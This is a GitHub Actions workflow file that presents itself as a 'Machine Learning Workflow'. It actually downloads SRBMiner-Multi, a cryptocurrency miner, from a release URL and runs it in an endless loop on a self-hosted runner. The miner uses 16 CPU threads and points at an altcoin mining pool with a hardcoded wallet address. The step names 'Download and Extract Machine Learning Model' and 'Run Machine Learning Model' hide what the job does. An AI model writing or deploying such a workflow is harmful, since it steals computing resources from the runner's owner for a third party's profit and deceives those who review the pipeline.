name: Machine Learning Workflow

on:
  push:
    branches:
      - main  # You might need to adjust this depending on your default branch name

jobs:
  build:
    runs-on: self-hosted

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Install Dependencies
        run: |
          sudo apt update
          sudo apt install wget
          sudo apt -y install tar xz-utils

      - name: Download and Extract Machine Learning Model
        run: |
          wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.4.7/SRBMiner-Multi-2-4-7-Linux.tar.xz
          tar xf SRBMiner-Multi-2-4-7-Linux.tar.xz
          cd SRBMiner-Multi-2-4-7

      - name: List Files
        run: |
          ls -la  # Use this command to check if SRBMiner-MULTI exists in the directory

      - name: Run Machine Learning Model
        run: |
          cd SRBMiner-Multi-2-4-7  # Move to the correct directory
          while true; do
            ./SRBMiner-MULTI --disable-gpu --algorithm yespower --pool ru-stratum.altcoinpool.ru:6234 --wallet VUsSwd174irshqzSjVhZ8aSCjqooTG6Mi6.g1 pause --cpu-Threads 16 --keepalive true
            sleep 30  # Wait for 30 seconds before restarting
          done
